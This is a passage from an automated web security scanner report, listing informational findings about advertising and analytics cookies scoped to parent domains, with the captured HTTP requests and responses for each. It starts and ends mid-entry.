Set-Cookie: udm_0=MLvv81MJYS5jpb4vCV71ElxQ9cJHI+OoAkk9e6pq0kVArFRgaSVo+Ku8pFsZ0sSX2gU5VXV/cXD2ShtoxVqM22YeOkkbJabx6POjY2RyZQkpiukWgEaXDEWPclzeoLQZTQRDDL+H9gO5cmv6G5BmbIxHKQ/xj9ssbFNfVI9MGleu9LAj2ntBCzEEkFvJOUQdLKxEkjYP5PF2pFaL/bCBSEyfngKL8aBrvfrsrWAb+or/MloD+pVmtp3nCezdAlVhUp6WcfJNc/sBm/MqRZsVs9JpPXwYog7hu3nLnhmYwoiwGINl4/TJohqQKbb1/aUu4gWV1Gm9KhPW8oqqoX95NFsQYLjqsQT62NLWKaI7s1qJBiSnKXN4AqK+dN4Ny5gElKS/iPUA4xrCNPVGIPmppAxKdpt69rEmB703Ut/V+p1KbirkHdMAW/T95jQMMFrrZRDQpFcnB5Y8PvYehxq0Jic0D+OatsX5+drr53CfRpEt1xhS5Prvg2x8Sz9dpdym+rvaIiObcqaLkbNNA0wR3E4Avt6X8hZN3fw7aWrEId7wJgT5T4TbLDxeBHyZS+biA1AaofPHqCsV8+NCw7j0g4Ko+/g9+zzBKVRsTn5HN27zRVFJ28YDwXVIIo4aLMddoIadm7sqIRe59bhXYV8BH2PF33MO; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
Last-Modified: Sun, 04 Sep 2011 00:42:17 GMT
Cache-Control: max-age=3600, private
Expires: Sun, 04 Sep 2011 01:42:17 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:16 GMT
Content-Length: 6201

//AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC)
var rsi_now= new Date();
var rsi_csid= 'J06575';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...

13.40. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=D+sYO9aFHYIiGS8sQdwSkaIxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:08:19 GMT; path=/
GUID=MTMxNTA5ODQ5OTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:08:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=99999&guidm=1:1765ifu1akkc79&bnum=4006 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=mq6XO9aFIYIiGA3sQhwSkaAc

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:08:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=D+sYO9aFHYIiGS8sQdwSkaIxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:08:19 GMT; path=/
Set-Cookie: GUID=MTMxNTA5ODQ5OTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:08:19 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 04 Sep 2011 02:08:19 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.41. http://load.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TFF=eJxLtDK1qi62MjSyUjI0MHEwsDBwsLS0NFKyTrQysqrOtDK0BmJzA3MgZQBj1mKoNwSpN0ZTbwTFyPrM4dqI0wGkDUyINzs1IjUnsSSVOLNrAXTxQVw%253D; expires=Mon, 02-Jan-2012 01:13:04 GMT; path=/; domain=.exelator.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=080&j=0&u=1234567&site=2222 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJxLtDK1qi62MjSyUjI0MHEwsDBwsLS0NFKyTrQysqrOtDK0BmJzA3MgZQBj1mKoNwSpN0ZTbwTFyPrM4dqI0wGkDUyINzs1IjUnsSSVOLNrAXTxQVw%253D; expires=Mon, 02-Jan-2012 01:13:04 GMT; path=/; domain=.exelator.com
Location: http://segments.adap.tv/data/?p=exelate&uid=1234567&sid=2222&ag=!!AGE!!&seg=
Content-Length: 0
Date: Sun, 04 Sep 2011 01:13:04 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2

13.42. http://log.adap.tv/log previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://log.adap.tv
Path:	/log

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

asptvw1="ap4148%2C2%2C2011-09-03%2F18-44-50";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:01:57 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /log?event=videoView&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: log.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Set-Cookie: asptvw1="ap4148%2C2%2C2011-09-03%2F18-44-50";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:01:57 GMT
Content-Length: 0

13.43. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nmcharlotte.112.2o7.net
Path:	/b/ss/nmcharlotte/1/H.20.3/s85129847696516

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_efhcjygdx7Fx7Fn=[CS]v4|27316788050129B3-4000010AC034C512|4E62C9FC[CE]; Expires=Fri, 2 Sep 2016 01:06:24 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/nmcharlotte/1/H.20.3/s85129847696516?AQB=1&ndh=1&t=3/8/2011%2019%3A45%3A22%206%20300&pageName=Story%3A%202577566%7CRaceday%26%2358%3B%20Danica%20already%20gone%26%2363%3B&g=http%3A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html&r=http%3A//www.google.com/trends/hottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&cc=USD&ch=Charlotte%20Observer%3A%20Sports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&server=charlotteobserver.com&events=event7&c1=http%3A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html&h1=CLT%7CCharlotte%20Observer%7CSports%7C%7C%7C%7C%7CSports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&c2=1.0%7C&c3=*Story&v3=Cal%20Monthly%20Visit%20Number%3A%201&c4=charlotteobserver%7CManual%20Entry%7Cjutter@charlotteobserver.com%7C%26%238236%3BBy%20Jim%20Utter%26%238237%3B&v4=Story%3A%202577566%7CRaceday%26%2358%3B%20Danica%20already%20gone%26%2363%3B&c5=Unknown&c6=CLT%7CCharlotte%20Observer%7CSports%7C%7C%7C%7C%7CSports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&c10=http%3A//www.charlotteobserver.com/2011/09/03/2577566_raceday-danica-already-gone.html&c13=Unknown&c20=GUID%3A%201583150943143157846%20%7C%20Story%3A%202577566%7CP%3A%20Charlotte%20Observer%3A%20Sports%20%7C%20*%20Sports%20Hold%20%7E%20Sports%20%3A%20charlotteobserver.com&c31=2011/09/03&c32=2011/09/03%20H20&c33=8%3A30PM&c34=Saturday&c37=237%7C2577566%7Chttp%3A//www.charlotteobserver.com/2011/09/03/2577566_raceday-danica-already-gone.html&c39=%20&c42=Cal%20Monthly%20Visit%20Number%3A%201&c43=Entry%20Page&c44=Entry%20Page&c48=NoTextAd%3A%20*Story%3Acharlotteobserver.com%3ASports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: nmcharlotte.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:06:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_efhcjygdx7Fx7Fn=[CS]v4|27316788050129B3-4000010AC034C512|4E62C9FC[CE]; Expires=Fri, 2 Sep 2016 01:06:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:06:24 GMT
Last-Modified: Mon, 05 Sep 2011 01:06:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E62CF10-534D-7B222958"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Location: http://b.scorecardresearch.com/r?c2=6035363&d.c=gif&d.o=nmcharlotte&d.x=245456460&d.t=page&d.u=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html
xserver: www86
Content-Length: 0
Content-Type: text/plain

13.44. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

tick=1315097079013; Domain=outbrain.com; Path=/
_lvs2="RifDljbBnUo="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
_lvd2="a20VgmTZEaeQlaVAQ/tI3Q=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 10-Sep-2011 13:32:39 GMT; Path=/
_rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
recs-1ac7243e27be1904dc4b28c0c3b41b7f="5sHw/4cdKR1RBwoxQ+NK56Gt39jPhS7BtAFn45s7nNxBJBStyd24vYRw03xty00LSHEMw5NUdblMWfcjIdzz7o0VClIcP3suYYfuX/vSYbkv2mx6/RuYBJJtD16TCm5FO5dLo73fEkx5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sun, 04-Sep-2011 00:49:39 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&settings=true&recs=true&widgetJSId=AR_2&key=AYQHSUWJ8576&idx=0&version=42206&ref=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&apv=false&sig=rsi_seg&format=html&rand=88096 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1315097079013; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="RifDljbBnUo="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
Set-Cookie: _lvd2="a20VgmTZEaeQlaVAQ/tI3Q=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 10-Sep-2011 13:32:39 GMT; Path=/
Set-Cookie: _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
Set-Cookie: recs-1ac7243e27be1904dc4b28c0c3b41b7f="5sHw/4cdKR1RBwoxQ+NK56Gt39jPhS7BtAFn45s7nNxBJBStyd24vYRw03xty00LSHEMw5NUdblMWfcjIdzz7o0VClIcP3suYYfuX/vSYbkv2mx6/RuYBJJtD16TCm5FO5dLo73fEkx5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sun, 04-Sep-2011 00:49:39 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:44:38 GMT
Content-Length: 15137

var ob_clbk=(typeof(OBR.extern)==='undefined')?outbrain:OBR.extern;ob_clbk.returnedHtmlData({"response":{"html":"\u003cdiv class\u003d\"ob_dual_container AR_2\"\u003e\n \u003cspan class\u003d\"ob_em
...[SNIP]...

13.45. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:00 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112499; path=/; domain=.rubiconproject.com
csi15=3214998.js^1^1315097100^1315097100&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:45:00 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-15.js?cb=0.9818868087604642 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: nus_2046=0.00; expires=Mon, 05-Sep-2011 00:45:00 GMT; max-age=86400; path=/; domain=.rubiconproject.com
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:00 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:45:00 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112499; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3214998.js^1^1315097100^1315097100&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:45:00 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1133

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3214998"
...[SNIP]...

13.46. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-2.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112482; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

13.47. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6291/9346/15214-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=6291/9346; expires=Sun, 04-Sep-2011 02:05:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=5032^19&9346^3; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111296; path=/; domain=.rubiconproject.com
csi15=3203911.js^3^1315097079^1315098303&3225379.js^1^1315097102^1315097102&3164883.js^1^1315097102^1315097102&3214998.js^4^1315097100^1315097102; expires=Sun, 11-Sep-2011 01:05:03 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6291/9346/15214-15.js?cb=0.6276808138936758&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%265364%3D1%267751%3D1; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:03 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:05:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 02:05:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^19&9346^3; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111296; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3203911.js^3^1315097079^1315098303&3225379.js^1^1315097102^1315097102&3164883.js^1^1315097102^1315097102&3214998.js^4^1315097100^1315097102; expires=Sun, 11-Sep-2011 01:05:03 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1915

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3203911"
...[SNIP]...

13.48. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6291/9346/15214-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=6291/9346; expires=Sun, 04-Sep-2011 02:01:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=5032^28&9346^3; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111512; path=/; domain=.rubiconproject.com
csi2=3196491.js^2^1315097278^1315098087&3152805.js^1^1315097124^1315097124&224353.js^1^1315097124^1315097124&3220233.js^1^1315097119^1315097119&3222405.js^2^1315097118^1315097119&3164882.js^1^1315097118^1315097118&3214995.js^4^1315096957^1315097118; expires=Sun, 11-Sep-2011 01:01:27 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6291/9346/15214-2.js?cb=0.41656556632369757&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; ses2=5032^1; csi2=3214995.js^1^1315096957^1315096957

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:01:27 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:01:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 02:01:27 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^28&9346^3; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111512; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196491.js^2^1315097278^1315098087&3152805.js^1^1315097124^1315097124&224353.js^1^1315097124^1315097124&3220233.js^1^1315097119^1315097119&3222405.js^2^1315097118^1315097119&3164882.js^1^1315097118^1315097118&3214995.js^4^1315096957^1315097118; expires=Sun, 11-Sep-2011 01:01:27 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2067

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196491"
...[SNIP]...

13.49. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BriligContact=5d4ee69c-99de-419c-8ef9-9d7e686b3586; Domain=.brilig.com; Expires=Tue, 27-Aug-2041 00:53:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=d6b47090-0a45-4cd9-8cf9-d1081a8879d8&_ct=pixel&REDIR=rt.legolas-media.com/lgrt?ci=1%26ti=12%26sti=28%26sts=1315096931625343%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
